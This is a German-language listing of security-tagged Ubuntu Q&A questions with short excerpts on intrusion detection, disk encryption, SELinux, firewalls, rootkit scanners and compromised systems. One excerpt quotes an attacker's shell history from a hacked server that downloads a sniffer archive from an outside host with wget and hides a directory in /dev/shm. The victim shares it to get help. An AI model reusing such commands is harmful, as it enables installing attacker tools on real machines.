Als «security» getaggte Fragen

Die Sicherheit umfasst eine breite Palette von Themen, darunter Benutzer, Berechtigungen, Authentifizierung, Autorisierung, Upgrades, Firewalling, Hardening usw.

3
Welche Einrichtung zur automatischen Benachrichtigung / Erkennung von Eindringlingen eignet sich für die Verwendung auf dem Desktop zu Hause?
Ich benutze Linux seit einiger Zeit und habe immer das Bedürfnis nach einer passiven Software / Skript-Einrichtung, die mich über verdächtige Netzwerkaktivitäten wie Scans, fehlgeschlagene Anmeldeversuche usw. im laufenden Betrieb per E-Mail oder per E-Mail benachrichtigen kann visuelle / akustische Benachrichtigungen. Ich weiß, wie man in Protokollen und so weiter …
2
Yubikey Zwei-Faktor-Authentifizierung Vollständige Festplattenverschlüsselung über LUKS
Ich habe kürzlich einen Yubikey Neo gekauft - ein flottes kleines Gerät zur Authentifizierung mit zweitem Hardwarefaktor. Es ist in erster Linie für die Verwendung mit Einmalkennwörtern und dem aufkommenden U2F-Protokoll vorgesehen. Seit Yubikey Version 2 unterstützt es jedoch auch die HMAC-SHA1-Challenge-Response-Authentifizierung. HMAC-SHA1 kombiniert einen geheimen Schlüssel (der im Yubikey …
2
Ist es eine schlechte Idee, SELinux und AppArmor gleichzeitig auszuführen?
Meine Unternehmensrichtlinie besagt, dass Linux-Boxen mit SELinux gesichert werden müssen (damit ein Sicherheitsprüfer das Kontrollkästchen "Ja, wir sind extrem sicher!" Für jeden Server aktivieren kann). Ich hatte gehofft, Ubuntus großartige Standard-AppArmor-Sicherheit nutzen zu können. Ist es nicht ratsam, sowohl Apparmor als auch SELinux auszuführen? (Wenn ja, kann diese schlechte Idee …
6
PC gehackt: Wie kann ich diesen Benutzer daran hindern, sich erneut anzumelden? Wie finde ich heraus, wie sie sich anmelden?
Ich bin zu 99,9% sicher, dass mein System auf meinem PC infiltriert wurde. Gestatten Sie mir, zunächst meine Überlegungen anzustellen, damit die Situation klar wird: Grobe Zeitleiste verdächtiger Aktivitäten und nachfolgender Maßnahmen: 4-26 23:00 Ich beendete alle Programme und schloss meinen Laptop. 4-27 12:00 Ich habe meinen Laptop geöffnet, nachdem …
5
Wie wichtig ist das sudo Passwort?
Ich weiß, dass das sudo-Passwort meinen Computer davor schützt, lokal von jemandem gehackt zu werden, der physischen Zugriff darauf hat ( Bearbeiten: Tatsächlich ist dies nicht der Fall ). Mein Passwort ist für diesen Zweck stark genug, aber ich weiß, dass es nicht stark genug ist, wenn jemand es aus …
6
Wie kann ich bestätigen, dass die Binärdateien in meinem Ubuntu aus dem Quellcode stammen, aus dem sie stammen sollen?
Wie 99% der Benutzer installiere ich Ubuntu von vorgefertigten Binärdateien. Wie kann ich mich verifizieren, dass diese Binärdateien tatsächlich aus dem ursprünglichen Quellcode von Ubuntu stammen? Es wäre gut zu überprüfen, ob NSA / Jemand nicht mit Ubuntu oder Linode (meinem VPS-Provider) zusammengearbeitet hat, um mit den Binärdateien herumzuspielen. Wenn …
25 security 
5
Gibt es eine vorinstallierte oder automatische Firewall?
Kommt Ubuntu mit einer vorinstallierten oder automatischen Firewall? Wenn nicht, brauche ich einen? Ich habe einige Artikel über die Vorteile von Linux im Vergleich zu anderen Betriebssystemen in Bezug auf die Sicherheit gelesen (keine Notwendigkeit für Virenschutz, ...), möchte aber sicher gehen.
1
rkhunter warnt vor /etc/.java /etc/.udev /etc/.initramfs
Ich verwende Ubuntu 10.04.1 LTS. Ich lasse rkhunter laufen , um nach Rootkits zu suchen . rkhunter beschwert sich über folgende versteckte Dateien und Verzeichnisse. Ich denke, diese Dateien sind kein echtes Problem auf meinem System, aber wie kann ich überprüfen, ob es sich bei diesen Dateien um legitime Dateien …
2
SSH Backdoor auf VServer gefunden. Was ist zu tun?
Gestern habe ich meinen Befehlsverlauf auf meinem VServer überprüft. Ich habe mehrere verdächtige Zeilen gefunden. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " …
24 ssh  security  malware 
2
Ist das Meta-Release-Upgrade (Do-Release-Upgrade) sicher?
Ich versuche, den do-release-upgradeProzess zu verstehen , dh die Art und Weise, wie Ubuntu mich auffordert, auf die nächste Ubuntu-Veröffentlichung im Frühjahr oder Herbst zu aktualisieren. Nachdem ich die Quellen für gelesen hatte, ubuntu-release-upgraderfand ich die Datei / etc / update-manager / meta-release auf meinem System. Diese Datei wird angezeigt. …
2
Wie wird das System sicher gehalten?
Ich verstehe, dass Malware, wenn sie in ein Linux-System eindringt, allenfalls ein Benutzerrecht erhält und alles ruiniert, was sich in der Reichweite des jeweiligen Benutzers befindet, dh die eigenen Dateien des Benutzers. Aber was genau hindert die Malware daran, auf Root-Ebene zuzugreifen? Kann es nicht irgendwie das Passwort von innen …
24 security 
Durch die Nutzung unserer Website bestätigen Sie, dass Sie unsere Cookie-Richtlinie und Datenschutzrichtlinie gelesen und verstanden haben.
Licensed under cc by-sa 3.0 with attribution required.